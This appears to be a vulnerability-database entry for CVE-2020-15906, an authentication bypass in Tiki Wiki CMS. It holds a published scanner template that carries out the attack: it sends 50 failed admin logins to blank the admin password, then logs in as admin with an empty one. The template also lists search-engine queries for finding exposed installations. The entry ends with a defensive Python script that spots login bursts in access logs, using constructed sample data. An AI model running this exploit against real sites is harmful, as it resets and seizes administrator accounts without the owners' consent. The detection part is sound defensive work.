CVE-2020-15906: Tiki Wiki CMS GroupWare - Authentication Bypass

Date: 2025-08-01 | Affected software: Tiki Wiki CMS GroupWare | PoC: published

Vulnerability description

tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.

PoC code [published]

id: CVE-2020-15906

info:
  name: Tiki Wiki CMS GroupWare - Authentication Bypass
  author: JeonSungHyun[nukunga],gy741,oIfloraIo,nechyo,harksu
  severity: critical
  description: |
    tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts.
  reference:
    - https://packetstormsecurity.com/files/159663/Tiki-Wiki-CMS-Groupware-21.1-Authentication-Bypass.html
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15906
    - https://github.com/Z0fhack/Goby_POC
    - https://github.com/bakery312/Vulhub-Reproduce
    - https://github.com/20142995/Goby
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2020-15906
    cwe-id: CWE-307
    epss-score: 0.91138
    epss-percentile: 0.99632
    cpe: cpe:2.3:a:tiki:tiki:*:*:*:*:*:*:*:*
  metadata:
    vendor: tiki
    product: tiki
    shodan-query: title:"Tiki Wiki CMS"
    fofa-query: title="Tiki Wiki CMS"
    google-query: intitle:"Tiki Wiki CMS"
  tags: packetstorm,cve,cve2020,tiki,wiki,auth-bypass

http:
  - raw:
      - |
        GET /tiki-login_scr.php HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        part: body
        name: ticket1
        internal: true
        group: 1
        regex:
          - 'class="ticket" name="ticket" value="(.*)"'

  - raw:
      - |
        POST /tiki-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/tiki-login_scr.php

        ticket={{ticket1}}&user=admin&pass={{attempt}}&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n

    payloads:
      attempt:
        - nkQ0yYzgF5Er
        - P5UdGflH48W3
        - xFq7vKNLmhZp
        - 8zKtGnh4dW5R
        - CfXp2VbQz8Er
        - Lh3K6vPzM9Xn
        - bG4RxHpY2MdQ
        - 7zNtKh3WqF5L
        - Y8rQ2GpLx9Kn
        - C7KzLmP5X9Vh
        - v3LdX8GmQ5Kn
        - W4NzX6PqL3Ft
        - Q5GhY2VrX7Jk
        - r9KdL4PhY6Gm
        - 8XjVq5LhZ2Kr
        - L5WnQ9KzY8Pr
        - M2XdL5GrY9Kh
        - N6YzP8WkL5Xt
        - G7JqX5VbM2Kp
        - H4PrX8LkY6Gm
        - J5LhY2VqX9Kr
        - 8GrX5NqL2KhY
        - K4WnY9PzM8Xt
        - Q2XkL5PrY8Vh
        - 9JhL4VqX5GrM
        - N2XdY5PqL9Kh
        - W4LhY8KzM5Xt
        - G5JqX2VrY9Kp
        - H9PrL5XkY2Gm
        - L8WnX5KzY9Pr
        - M4XkY2LqV5Gt
        - N5XdL9PqY8Kr
        - P8XnL5VrY2Kh
        - Q4JqX9LhY5Gr
        - V7LkX5PrY2Gt
        - L2WnY9KzX8Pr
        - M9XdL5PqY4Kh
        - N8LhY2VqX5Gr
        - Q7XkL5PrY9Gm
        - X4LhY8WnM5Kp
        - G2JqL5VrY9Kt
        - H7PrX8KzY2Gm
        - J4LhY5VqX9Kr
        - N9XkY2LqP5Gt
        - W8LhY5PrX2Kz
        - G4JqL5XkY9Vr
        - P5WnY2KzL8Gt
        - M7XkY9LhP2Gr
        - Q2JqL5VrY8Kh
        - 2JqL5VrY8Kh
    attack: batteringram
    threads: 50

  - raw:
      - |
        GET /tiki-login_scr.php HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /tiki-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Referer: {{RootURL}}/tiki-login.php

        ticket={{ticket2}}&user=admin&pass=&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n

    extractors:
      - type: regex
        part: body_1
        name: ticket2
        internal: true
        group: 1
        regex:
          - 'class="ticket" name="ticket" value="(.*)"'

  - raw:
      - |
        GET /tiki-index.php HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: or
    matchers:
      - type: word
        part: body
        words:
          - "System Menu"
          - "Home"
          - "Search"
          - "Wiki"
          - "File Galleries"
          - "Settings"
        condition: and

      - type: word
        words:
          - "Show on admin log-in"
          - "Tiki Setup"
        condition: and
# digest: 4b0a00483046022100b24c3d5f8121cab1fb17b6c7b0301c144a888d0504979c5b84dbae6b0932a2c8022100b2335bb9c6f2c4c7bbca825fea0fda1b8169fd95d8246b192b9dfa27a508f78c:922c64590222798bb761d5b6d8e72950
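As an added example, not part of the template above or of the Tiki project: detection logic a defender can run over web-server access logs to spot the burst of login POSTs that CWE-307 weaknesses like this one require (50 attempts here). The log lines, client addresses and timestamps are constructed; the threshold defaults to the 50 attempts the bug needs, and a production alert would sit well below that.

```python
"""Detect a brute-force burst against tiki-login.php in web access logs.
Added example, not from the template or the Tiki project: CVE-2020-15906
fires after 50 invalid logins, so a run of POSTs to /tiki-login.php from one
client is the signal to alert on. Log lines are constructed (Apache combined
format); the POST body, and so the user name, is not in the access log."""
import re
from collections import defaultdict, deque
from datetime import datetime

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

def find_login_bursts(lines, threshold=50, window_s=300):
    """Return sorted [(ip, peak_count)] for clients that POST to
    /tiki-login.php at least `threshold` times within `window_s` seconds."""
    recent = defaultdict(deque)  # ip -> timestamps of login POSTs in window
    flagged = {}
    for line in lines:
        rec = parse_line(line)
        if not rec or rec["method"] != "POST":
            continue
        if rec["path"].split("?", 1)[0] != "/tiki-login.php":
            continue
        q = recent[rec["ip"]]
        q.append(rec["ts"])
        while (q[-1] - q[0]).total_seconds() > window_s:  # slide the window
            q.popleft()
        if len(q) >= threshold:
            flagged[rec["ip"]] = max(flagged.get(rec["ip"], 0), len(q))
    return sorted(flagged.items())

# Constructed sample: 203.0.113.9 posts the login form 50 times in 50 s and
# then fetches tiki-index.php; 198.51.100.4 is a single ordinary login.
SAMPLE_LOG = (
    ['198.51.100.4 - - [01/Aug/2025:09:59:30 +0000] "POST /tiki-login.php HTTP/1.1" 302 -']
    + [f'203.0.113.9 - - [01/Aug/2025:10:00:{i:02d} +0000] "POST /tiki-login.php HTTP/1.1" 302 -' for i in range(50)]
    + ['203.0.113.9 - - [01/Aug/2025:10:01:00 +0000] "GET /tiki-index.php HTTP/1.1" 200 5120']
)
```

Because the access log does not carry the POST body, the detector keys on path and source address only; a reverse proxy or WAF that logs the `user` field would let the rule narrow to attempts against `admin`.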
